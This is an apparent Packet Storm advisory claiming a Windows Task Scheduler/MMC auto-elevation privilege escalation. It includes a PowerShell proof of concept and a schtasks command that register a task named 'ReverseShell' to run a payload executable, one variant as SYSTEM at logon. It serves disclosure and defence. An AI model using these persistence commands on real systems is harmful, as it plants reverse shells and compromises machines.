exploit the possibilities

Microsoft Windows Task Scheduler Local Privilege Escalation

Microsoft Windows Task Scheduler Local Privilege Escalation
Posted Jul 19, 2019
Authored by Social Engineering Neo

Microsoft Windows Task Scheduler suffers from a local privilege escalation vulnerability. The Windows MMC auto-elevates members of the 'administrators' group via the GUI and MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional elevation of privilege.

tags | exploit, local
systems | windows
MD5 | 8e6e723a39a4d2907bdf7a5b25c884e6

Microsoft Windows Task Scheduler Local Privilege Escalation

Change Mirror Download
Microsoft Windows Task Scheduler local EoP Report by Social Engineering Neo.


Affected Platforms: -
Microsoft Windows ≤10


Tested On: -
Windows 10 (build 1809, 1903) & Windows 7 SP1.
Tested on the most recent security patch. (July 2019)


Class: -
Improper Authorization - (CWE-285).
Remote Code Execution.


Summary: - The Typical Computer User Can Trigger Programs at Intervals on any Account existing on the Host System/Domain without Propper Authorization.


Short Description: - The Windows MMC auto-elevates members of the 'administrators' group via the GUI, MMC snap-ins (via mmc.exe) automatically elevate without prompting UAC potentially leading to unintentional EoP.


Long Description: - The built-in Windows component 'Microsoft Management Console' is potentially affected by improper authorization. MMC snap-ins (.msc) auto-elevate users existing in the 'administrators' group including administrator accounts.
: - Only the GUI seems to be affected, this is shown with our simple PowerShell script when you adjust '-Daily -At 9pm' to '-AtLogOn' or '-AtStartUp' additional permissions are required.
: - Whereas the GUI allows "-AtLogOn" without additional permissions.
: - An attacker with the ability to execute 'taskschd.msc' with arguments through the CLI is able to perform this attack with elevated permissions as a payload, therefore exploitability is greatly increased.
: - HIDS/HIPS without specific configurations may not detect such events as alerts or warnings and simply log the event instead, increasing the chances of a system administrator looking past the issue.
: - Enterprise/Personal systems complying with basic security practices are less likely to be affected, the average computer user with default system configuration could be vulnerable to such attacks.


Proof of Concept: - (PowerShell)
#Windows ≤7
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\seneo\Documents\payload-x64.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger

#Windows ≥8
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\seneo\Documents\payload-x64.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."

#The above PowerShell script will create a task titled "ReverseShell" with the description "This Task Will Run the Reverse Shell."
#Some additional configuration of the PowerShell may be required.
#We have our own reverse shell payload, its up to you "the attacker" to create your own payload.
#
#NOTE: Task should run everyday at 9pm (system time). You can change this to what suits your needs.
# Task will only have 'user' permissions, this PoC only exists to prove modifying line 9, col 39 & line 3, col 28 to either "AtLogIn" or "AtStartUp" will result in access denied.
# The GUI is automatically elevated, whereas the CLI is not.
# ***We have later noticed this PoC is essentially the same as running `schtasks.exe /Create /SC ONLOGON /TN ReverseShell /TR C:\Users\seneo\Documents\payload-x64.exe /RU "NT AUTHORITY\SYSTEM"` *additional permissions needed for CLI, not GUI*


VIDEO: - https://youtu.be/z2C-IykCfbk **updated**
: - https://youtu.be/_leFNyo5wxM **original**


Expected Result: -
Normal users should not be able to run tasks as other user and execute programs on accounts without proper authorization.


Observed Result: -
Task runs with 'SYSTEM' privileges on all users upon trigger with no authentication, leading to total system compromisation.


Our Recommendation: -
System Administrators should follow basic security practices to prevent enterprise/client systems being affected with this issue.
Microsoft should prevent the Microsoft Management Console (MMC) snap-ins from auto-elevating without UAC authorization.
The average user should be informed about attacks like this because most "average" users will not understand how they can be affected by attacks such as this.
Proper access control implementations will greatly reduce risk towards enterprise systems.


NVD CVSS v3 Vector: -
AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H/E:P/RL:W/RC:R/CR:L/IR:L/AR:L/MAV:L/MAC:L/MPR:L/MUI:R/MS:C/MC:H/MI:H/MA:H

CVSS Base Score: - 8.2
Impact Sub score: - 6.0
Exploitability Sub score: - 1.5
CVSS Temporal Score: - 7.2
CVSS Environmental Score: - 5.7
Modified Impact Sub score: - 4.5
Overall CVSS Score: - 5.7


NVD CVSS v2 Vector: -
(AV:L/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:W/RC:UR/CDP:MH/TD:M/CR:L/IR:L/AR:L)

CVSS Base Score: - 6.8
Impact Sub score: - 10.0
Exploitability Sub score: - 3.1
CVSS Temporal Score: - 5.5
CVSS Environmental Score: - 4.8
Modified Impact Sub score: - 7.3
Overall CVSS Score: - 4.8


MITRE CVSS Vector: -
Base Vector: - AV:L/AC:L/Au:S/C:C/I:C/A:C
Base Score: - 6.8


TIMELINE: - Discovery 5th July 2019
: - Initial Report 5th July 2019
: - Case Opened 8th July 2019
: - Added Detail 8th July 2019 *Public Disclosure Date: - 30th July 2019 (25 days from initial discovery)
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019
: - Case Closed 9th July 2019
: - MSRC Response 9th July 2019
: - Our Response 9th July 2019 *Public Disclosure Date: - 10th July 2019 (24 hours from closed case)

: - We thank the MSRC team for their quick response.
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    13 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close